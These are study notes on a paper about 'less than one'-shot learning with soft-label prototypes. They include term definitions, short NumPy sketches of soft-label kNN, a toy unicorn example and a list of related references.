Ilia Sucholutsky and Matthias Schonlau. 'Less Than One'-Shot Learning: Learning N Classes From M < N Samples. In AAAI 2021 Proceedings.
Inspiration
Soft labels carry more information than hard labels, which makes them suitable for the LO-shot (less-than-one-shot) setting.
- Soft labels can encode features shared across samples, increasing the information density and dimensionality of each label.
- Goal: with very few training samples, the model should still recognize as many classes as possible with sufficient accuracy.
Terms
prototypes: soft-labelled synthetic images
unrestricted soft label: each element may take any value, including negative values.
soft / probabilistic label: a probability distribution over the classes for a sample; the per-class probabilities sum to 1 and can be obtained with a softmax function.
hard label: obtained by applying argmax to a soft label.
soft-label prototype (SLaP): a pair (X, Y) of a feature vector and its corresponding soft label.
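A minimal NumPy sketch of these label types; the 3-class example values, the `softmax` helper, and the 2-D feature vector are illustrative choices of mine, not taken from the paper.
```python
import numpy as np

def softmax(z):
    """Turn an unrestricted soft label into a probabilistic soft label."""
    e = np.exp(z - z.max())
    return e / e.sum()

# Unrestricted soft label: any real values, negatives allowed.
unrestricted = np.array([2.0, -1.0, 0.5])

# Soft / probabilistic label: non-negative, sums to 1.
soft = softmax(unrestricted)

# Hard label: argmax over the soft label.
hard = int(np.argmax(soft))

# Soft-label prototype (SLaP): a feature vector X paired with its soft label Y.
X = np.array([0.3, 0.7])   # hypothetical 2-D feature vector
slap = (X, soft)
print(soft, hard, slap)
```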
Corollary
Work & Findings
Distance-weighted kNN with hard-label prototypes is a special case of SLaPkNN (distance-weighted soft-label prototype kNN); a minimal sketch of this rule appears after the list below.
The authors analyze the resulting decision landscapes, derive a theoretical lower bound for separating N classes with M < N soft-label samples, and study the robustness of the resulting systems.
1. A method for analyzing the robustness and stability of the decision boundaries that are created;
2. Soft-label prototypes can represent a training set for class separation with far fewer prototypes than hard labels require; in the ideal case, the count drops from O(N^2) to O(1).
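As I read the paper, SLaPkNN takes the distance-weighted sum of the soft labels of the k nearest prototypes and predicts the argmax class. Below is a minimal NumPy sketch under that reading; the function name `slapknn_predict`, the `eps` guard against zero distances, and the default of using all prototypes are my own choices. With one-hot rows in `proto_Y`, it reduces to ordinary distance-weighted hard-label kNN, matching the statement above.
```python
import numpy as np

def slapknn_predict(x, proto_X, proto_Y, k=None, eps=1e-12):
    """Distance-weighted soft-label prototype kNN (SLaPkNN), sketched.

    x       : query point, shape (d,)
    proto_X : prototype locations, shape (M, d)
    proto_Y : prototype soft labels, shape (M, N) for N classes
    k       : number of neighbours (default: all M prototypes)
    """
    d = np.linalg.norm(proto_X - x, axis=1)      # distances to all prototypes
    k = len(proto_X) if k is None else k
    idx = np.argsort(d)[:k]                      # indices of the k nearest prototypes
    w = 1.0 / (d[idx] + eps)                     # inverse-distance weights
    class_scores = w @ proto_Y[idx]              # weighted sum of soft labels, shape (N,)
    return int(np.argmax(class_scores)), class_scores
```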
Experiments
An interesting framing
By description alone, samples from only two classes, rhinoceros and horse, can be used to obtain a classifier for a third class, unicorn, that is neither of them (a toy illustration appears at the end of this section).
FSL (few-shot learning) makes models more sample-efficient.
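To make the unicorn framing concrete, here is a toy 1-D usage of the `slapknn_predict` sketch above. The two prototypes, their soft-label values, and the class ordering (rhino, horse, unicorn) are invented for illustration; they are not the paper's construction.
```python
import numpy as np

classes = ["rhino", "horse", "unicorn"]
proto_X = np.array([[0.0], [1.0]])       # one "rhino-ish" and one "horse-ish" sample
proto_Y = np.array([[0.6, 0.0, 0.4],     # each soft label also assigns some
                    [0.0, 0.6, 0.4]])    # "unicorn" membership to the sample

for x in (0.1, 0.5, 0.9):
    pred, _ = slapknn_predict(np.array([x]), proto_X, proto_Y)
    print(x, classes[pred])
# 0.1 -> rhino, 0.5 -> unicorn, 0.9 -> horse: two soft-labelled samples
# carve out a decision region for a third class that has no sample of its own.
```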
References
Work on distilling / condensing datasets:
1. 2019, soft-label dataset distillation
Sucholutsky, I.; and Schonlau, M. 2019. Soft-Label Dataset Distillation and Text Dataset Distillation. arXiv preprint arXiv:1910.02551.
2. 2006, dynamic data condensation
Ruta, D. 2006. Dynamic data condensation for classification. In International Conference on Artificial Intelligence and Soft Computing, 672–681. Springer.
Classic few-shot learning architectures:
1. Matching networks, 2016:
Vinyals, O.; Blundell, C.; Lillicrap, T.; Wierstra, D.; et al. 2016. Matching networks for one shot learning. In Advances in Neural Information Processing Systems, 3630–3638.
2. Prototypical networks, 2017:
Snell, J.; Swersky, K.; and Zemel, R. 2017. Prototypical networks for few-shot learning. In Advances in Neural Information Processing Systems, 4077–4087.
3. Fei-Fei et al., one-shot learning of object categories, 2006:
Fei-Fei, L.; Fergus, R.; and Perona, P. 2006. One-shot learning of object categories. IEEE Transactions on Pattern Analysis and Machine Intelligence 28(4): 594–611.
Other related work:
0. 1996, active learning with statistical models
Cohn, D. A.; Ghahramani, Z.; and Jordan, M. I. 1996. Active learning with statistical models. Journal of Artificial Intelligence Research 4: 129–145.
1. 2017, active learning for convolutional neural networks
Sener, O.; and Savarese, S. 2017. Active learning for convolutional neural networks: A core-set approach. arXiv preprint arXiv:1708.00489 .
2. 2005, fast SVM training on very large data sets
Tsang, I. W.; Kwok, J. T.; and Cheung, P.-M. 2005. Core vector machines: Fast SVM training on very large data sets. Journal of Machine Learning Research 6(Apr): 363–392.
3. 2001, active learning for SVMs
Tong, S.; and Koller, D. 2001. Support vector machine active learning with applications to text classification. Journal of Machine Learning Research 2(Nov): 45–66.
4. 2008, classification on soft labels is robust against label noise
Thiel, C. 2008. Classification on soft labels is robust against label noise. In International Conference on Knowledge-Based and Intelligent Information and Engineering Systems, 65–73. Springer.
5. 2014, stochastic neighbor compression for kNN
Kusner, M.; Tyree, S.; Weinberger, K.; and Agrawal, K. 2014. Stochastic neighbor compression. In International Conference on Machine Learning, 622–630.